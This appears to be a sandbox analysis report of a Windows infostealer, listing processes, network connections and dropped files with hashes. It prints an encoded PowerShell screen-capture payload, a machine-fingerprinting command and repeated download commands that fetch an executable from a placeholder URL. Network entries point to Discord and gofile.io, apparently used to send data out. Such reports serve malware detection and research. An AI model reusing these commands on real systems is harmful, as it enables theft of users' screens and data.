lAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqzb5d1s\yqzb5d1s.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB054.tmp" "c:\Users\Admin\AppData\Local\Temp\yqzb5d1s\CSCF6F01569631D4B3ABC3A426DD969DFBA.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:50080 | tcp | |
| N/A | 127.0.0.1:50101 | tcp | |
| N/A | 127.0.0.1:50106 | tcp | |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| N/A | 127.0.0.1:50118 | tcp | |
| N/A | 127.0.0.1:50120 | tcp | |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.75.242.210:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| N/A | 127.0.0.1:50285 | tcp | |
| N/A | 127.0.0.1:50287 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
Files
memory/5492-0-0x0000000000010000-0x000000000123E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Exela.exe
| MD5 | c5669d422429ecf07edc2f00821ecd93 |
| SHA1 | 8da6ff8a15bd667719a72aa3ac5af33fb1c640c3 |
| SHA256 | 3ade121ba195ca8e6e37aaeb84152e735b89cdd68f0a14b787c4d0d3f7351e00 |
| SHA512 | d686372bacc27848c093012b64791a956cb3cd3bc915b65949d0cf4056e0317763d4dd3abf3b75ee55c968ee43e821a17796999a7978dde85d9e9133610a1253 |
C:\Users\Admin\AppData\Local\Temp\no defender.exe
| MD5 | c80d2a00b97cf55170b221f8a8f65e81 |
| SHA1 | a03c17751d8db91e1e66460093855dabbcfcc04b |
| SHA256 | af69ac0bc29db1b5bc7957411de2f49469525e32dbf76932d93489021f2bfe85 |
| SHA512 | 48b54cfe518b77a83957f7e1edad3ea09bc18f79ad24158b79345f1d29810e805340e74cc5b33effb081959502b7ea305fe1e0035450e2ecd03e6c5307b92879 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\ucrtbase.dll
| MD5 | 3b337c2d41069b0a1e43e30f891c3813 |
| SHA1 | ebee2827b5cb153cbbb51c9718da1549fa80fc5c |
| SHA256 | c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7 |
| SHA512 | fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\python311.dll
| MD5 | db09c9bbec6134db1766d369c339a0a1 |
| SHA1 | c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b |
| SHA256 | b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79 |
| SHA512 | 653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/6092-119-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat
| MD5 | bffa0b357688d06c9f66c79a5d091f8b |
| SHA1 | bc20d3a70777c646a86e5c4b98f3a038f0821106 |
| SHA256 | d2e461a8175a5a964e2012329e72b339c43386e9ded1bb742fd7233400a9c9df |
| SHA512 | 36f23e89943ea250ee71ee832e55e3eba396ede87689e6f0fce478118cdf46ef4b06f068c2ca24e128a3cfc242119794411dc930e3d67434598410fc50cce903 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_howav04c.czx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4380-129-0x000002A9799C0000-0x000002A9799E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15562\base_library.zip
| MD5 | 65089bae0fe6af0f4d44313a26c87f16 |
| SHA1 | 18449f77a946a7aadc7edf19c82006d22aaa487c |
| SHA256 | d204f68e076e4662bc8a585ff8cdfe3f0fc602ecc2e2f12afbe23b25425869d8 |
| SHA512 | 0c710bcaa747debdee12fa181afdeba6b24b77280b07d65cfeacc6a7d327c7af6f8c559e01701d65f5219197ea756df023b6b04ed826ea31f27f74cb776b1618 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\libffi-8.dll
| MD5 | decbba3add4c2246928ab385fb16a21e |
| SHA1 | 5f019eff11de3122ffa67a06d52d446a3448b75e |
| SHA256 | 4b43c1e42f6050ddb8e184c8ec4fb1de4a6001e068ece8e6ad47de0cc9fd4a2d |
| SHA512 | 760a42a3eb3ca13fa7b95d3bd0f411c270594ae3cf1d3cda349fa4f8b06ebe548b60cd438d68e2da37de0bc6f1c711823f5e917da02ed7047a45779ee08d7012 |
memory/6092-182-0x00007FFF68650000-0x00007FFF6865F000-memory.dmp
memory/6092-183-0x00007FFF62E20000-0x00007FFF62E39000-memory.dmp
memory/6092-185-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp
memory/6092-184-0x00007FFF62620000-0x00007FFF6264D000-memory.dmp
memory/6092-181-0x00007FFF62650000-0x00007FFF62674000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15562\select.pyd
| MD5 | c39459806c712b3b3242f8376218c1e1 |
| SHA1 | 85d254fb6cc5d6ed20a04026bff1158c8fd0a530 |
| SHA256 | 7cbd4339285d145b422afa280cee685258bc659806be9cf8b334805bc45b29c9 |
| SHA512 | b727c6d1cd451d658e174161135d3be48d7efda21c775b8145bc527a54d6592bfc50919276c6498d2e2233ac1524c1699f59f0f467cc6e43e5b5e9558c87f49d |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\pyexpat.pyd
| MD5 | fe0e32bfe3764ed5321454e1a01c81ec |
| SHA1 | 7690690df0a73bdcc54f0f04b674fc8a9a8f45fb |
| SHA256 | b399bff10812e9ea2c9800f74cb0e5002f9d9379baf1a3cef9d438caca35dc92 |
| SHA512 | d1777f9e684a9e4174e18651e6d921ae11757ecdbeb4ee678c6a28e0903a4b9ab9f6e1419670b4d428ee20f86c7d424177ed9daf4365cf2ee376fcd065c1c92d |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\libssl-1_1.dll
| MD5 | 6cd33578bc5629930329ca3303f0fae1 |
| SHA1 | f2f8e3248a72f98d27f0cfa0010e32175a18487f |
| SHA256 | 4150ee603ad2da7a6cb6a895cb5bd928e3a99af7e73c604de1fc224e0809fdb0 |
| SHA512 | c236a6ccc8577c85509d378c1ef014621cab6f6f4aa26796ff32d8eec8e98ded2e55d358a7d236594f7a48646dc2a6bf25b42a37aed549440d52873ebca4713e |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\libcrypto-1_1.dll
| MD5 | 86cfc84f8407ab1be6cc64a9702882ef |
| SHA1 | 86f3c502ed64df2a5e10b085103c2ffc9e3a4130 |
| SHA256 | 11b89cc5531b2a6b89fbbb406ebe8fb01f0bf789e672131b0354e10f9e091307 |
| SHA512 | b33f59497127cb1b4c1781693380576187c562563a9e367ce8abc14c97c51053a28af559cdd8bd66181012083e562c8a8771e3d46adeba269a848153a8e9173c |
memory/6092-209-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp
memory/6092-208-0x00007FFF62DF0000-0x00007FFF62E13000-memory.dmp
memory/6092-207-0x00007FFF63600000-0x00007FFF6360D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | 5f936491b052a832af3e509664cdbb14 |
| SHA1 | 901bfc680eb6944457c961c2b1f7acfc22bbeb5b |
| SHA256 | a7f53b76e7ea837f45bdb8712a864fb0c427c5eb863d155a72b422b96417ea10 |
| SHA512 | 6a8e7a80b162b5d7e512c7a5419dcd07832f929af2a79c74640fd7ef0189c50ccf78c8afa9678afc95152e56e92f7e7e86a2612b0f63e03989839dcd7153db2a |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 2710cc3c97a43f2c4280a1483e69eac3 |
| SHA1 | 853fd337682bd1122118a686f51bc265bf778a48 |
| SHA256 | 554b506ca648507f10eeb5bae124ff91594f5fdd81d33b0171334be7ad5c7816 |
| SHA512 | eefceaae770f417901124790a6aecc95ca294f533554b861d6d34c5c0748a2a90bf16b8ff32dbbda3049b32f607cca24d2db32b040faf616bbf64369c5579b33 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 73beb313800b1c4967a4dec481da0bf9 |
| SHA1 | 933a189d028066ff08fa78ac8058916fc7892998 |
| SHA256 | 9636be82c51d61dd990504d786fac0d51d41f73d22700a18d4fbbfcf6da5dff5 |
| SHA512 | 0fa631e9543dbea34aee3aab1295a1c373457dd1e2649478ef5d4d15b877979eec0d73cf4a5dd87e85c8a308265092d6d98ae97196e8caaa0f35a9a627243c99 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | c6fab38852d8b71a62e4b6c6b1ecd733 |
| SHA1 | 11aa6f21614dae9727e6d0e5cec339553f482be8 |
| SHA256 | 1516552690d6a38d65a8016d889f2ce1515649be6a45ef82cbed08a73690a7b4 |
| SHA512 | 8f04946369104fe6d092fcece49856a4b11ab92396ca4d2126355178db15becbf9db887d1ce53294849ddf6b77e263a43ee68242e9fa079f44ecee14a39e133b |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 28ca7ca918e132822c47024beb65c30f |
| SHA1 | a27a45c473582d368bcf4e9faf21f02e43689ae8 |
| SHA256 | 1d7d6e883472eb5ddafe383adbaa5f8ed7b9d6267e7ade971bbff47ec4b47935 |
| SHA512 | d26cb0f7c0bde5a6e5ceb8a37e763a40d159e38be74993a42f10091515b179a716e4e64289db4631a6a0b41a8ba5395540a16fba0e342f0f4d984bded021a87b |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-process-l1-1-0.dll
| MD5 | 5acf4b9d3487d85f2e204aead39d5664 |
| SHA1 | e5bd8492d65da2969914d41ee09609b6c47818be |
| SHA256 | a7433b9f8965f914da00dda4ede62d4db69f561a548cbc8d312293d0917a33c7 |
| SHA512 | e93c8daa7ad9ce7055438bc787fced6e0a3233dcabb2edb643d3a35779d65778337b798225437971674fdd30d8bc6dd7ac7eb0f550d4c8caf99436de877b2fbe |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 407d577907e199daec931d09f3ca202e |
| SHA1 | bfb05663117b49715a2e31ae7f0c38aaec5fa152 |
| SHA256 | 98e8728908f2872819728e709291529bac39751dec7d01c03a175c4688b9c233 |
| SHA512 | d5d76cfb0b572379655032156028a284b946368bbf4930d4318298caf2091ba2d364999849b53bc22bfc09d5e75943d921bccd902ceb38c0a14a7083035f898d |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | 93afd2a53dfa4aa1e35ea615d76b6c01 |
| SHA1 | 22c4550b96fd30dd64b214d6246e9458c1c699c2 |
| SHA256 | 31fc3b5665c3bb2006496b5cbb0e5667b186263a867dbe5a760a996305f4f514 |
| SHA512 | 979bf81c2cbbc19e2cf13e6871cec24fa1b9f1fa06e15cfade74dc211032053a3b8622ffc9a6dde86134a01f18140250f438797ac5acbe340a361213702e7277 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 60d8195416792fa2ac327445912d352d |
| SHA1 | d53c3c2e9e0106c95c02632fdd093cfd01ae9900 |
| SHA256 | d7fab15f2d1298a11822ce5c7756da2eab1112bd3561b22db6b25a5a8acafad6 |
| SHA512 | 470ee830ae66ad3331a5a928dcbc2f6865064c1c494a36747fa92ea2a328bbe2da917d1ab8374d16b1ea9002879757b34c4bd6afa2226d7d1a922fe1b34e0461 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | 6e6a258763888c7a49491a39868be3db |
| SHA1 | 7867377f30bc3744be4a0f1b265ef3a5ed0ecc00 |
| SHA256 | d9fc17ce5dd5aecac0dca2d9a17a20271a13f68cd6cfa89163d72904a72f6b8a |
| SHA512 | 97ec6626e64c52d98ea0d6897a5bd4cd3ea5639c37a406119e2d7579e2951b156eb9f8dd62b76ffb79ae7bf6678aa21c9073f759d8de4acc3b575a9f98c6782b |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | e6b9e39476a87a611524331549c7ec47 |
| SHA1 | 36513f3c137a5b1e8d195f833ba0a381f3f61f7a |
| SHA256 | b84f44a882b2caa6d0bc3c01e8d012e881324b800fd39e2728fecdc65315a245 |
| SHA512 | 865f3e9c519b67f5e9cb5fdfc9ec148e90a5c37ab78506356364712aa0b320a25558544b1e814629be92617666a1676d16ceccdd4dce2f6d11ed3d08eb582ef6 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | aa4189a2860aa4a59a1d09c41566b014 |
| SHA1 | e24414e590f40ea8e4c40067193da5610e64e165 |
| SHA256 | 1f818ccd44865c7c91c1ee5df7d21dc17840601d7470c0d1a486c5874304edd2 |
| SHA512 | 738943f74bc506a9c6bfa478bf31fdefdbed740a8f1fdfe40ae78257c920f25bf76ae4f3c1a2e4157d77cfe0c12c641e81091a7f507ee404abf3201cfe80d4b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 8fac4c0488e4734b9b3df2006caeabb2 |
| SHA1 | 783c1c210c67e7f23ba6a9e41f7999ab67e1fcfc |
| SHA256 | bf651fcd0f10dc528caa3168abd6ea528458c78aaa75b93b3c615d5a18567192 |
| SHA512 | 0f5c3f097a5785a68bf4688a9b5975fdf90e180d3287d67ab600fab16ec146a3330916b89e81162c335ca578bfcf6e1f9bed1653c61a20abf7a7e58d08310fa2 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-util-l1-1-0.dll
| MD5 | 175fc9b538e4d6d13d07acc4383c907c |
| SHA1 | d27d5890bb3d50f0a40bdf17685f49d529b01a12 |
| SHA256 | edd387b01cb9d85a44e27e656e5ea6898b8e9604682db29cb87ee3236f3a1d9f |
| SHA512 | 195c78ac1175b87bc0422ac706c671616e2c1fcb373e28210682d775bf875227b9b31c6fd16a4fb901a3a4e9d9b5b0a8067497d71f104d01cbccda37567ab046 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 5543fb8a912a0c9317589ea420cdd914 |
| SHA1 | a1431fd32f29fa2e6e6e04156764dbb70b7ec8b7 |
| SHA256 | bd4e40b2f5d0f60feceeb7622166e1a61fb34ac2cd5484e1d9826c7cffa3029c |
| SHA512 | 405ab712e9fc0ca7e318ffe8585bb7eb7d3c93ae56d9468ee7c81b91e7ae1c7bcaa03d4cd884abd4229f45cc65bd4f85c53bbb0bdc4cb1ecd53b06d3d199e1e4 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-sysinfo-l1-1-0.dll
| MD5 | f5cb1600d1cd61c17394556805818f20 |
| SHA1 | f7be7748bd8d32638fa253c7a8933dfc6a4e0f56 |
| SHA256 | e92ce06aa782a4e50a5bc95da5ac5ded0dc3da7e1152078002a12367aa7cc1af |
| SHA512 | 4e4e3a27635d19f55760b27986bd5fab8a0c56ae26c5e35e9a7e4c48a543a36d9f05990292b9d83410d16061d79dda3de208389b78a13cca83aa272239f834eb |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 34e5600f2244f5d0b00f00d9cd0d83b5 |
| SHA1 | dde2f5e6f4d6847ec16c0b5e368f0256a08307ce |
| SHA256 | 2d04920e410d81e3a044a76724a23cf892b23a5b382fb079abd6f689199c7428 |
| SHA512 | 3d7b013793bfe1da1caf1e312451fc1bb0de53deb3a2a7d227830d4e52571de2433a4e695b3116ed3129a9d96e93a307b2bb16a317050d0bd8ea88bfc7ebc4ac |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-synch-l1-1-0.dll
| MD5 | 0a5e0f886c97c23ba862520aa624c745 |
| SHA1 | a3a8434e9578b09d1b4f63bd992e8a4fa79ed177 |
| SHA256 | 882edcaa7b39dc9e330d1b3dcb2a770be2404d6358d76cf4cf5e52231bedac60 |
| SHA512 | 8b5df45e2827492e703564ee0731beba221a1faa7137aa980991f9e7d66b50916c26025d9157bd54bfc5c0b2ea6b04507247140bb5cc6d7d6a52fed34c794a4b |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-string-l1-1-0.dll
| MD5 | 0e34f7b6f4edb70c972772d4c3820c4e |
| SHA1 | 561329c9c81aa0b4f5d2b278cd97cdb32f42d238 |
| SHA256 | c9103f6afdd8a6fea734da372911b0a3b018a84e00675a9355ea6f091e641781 |
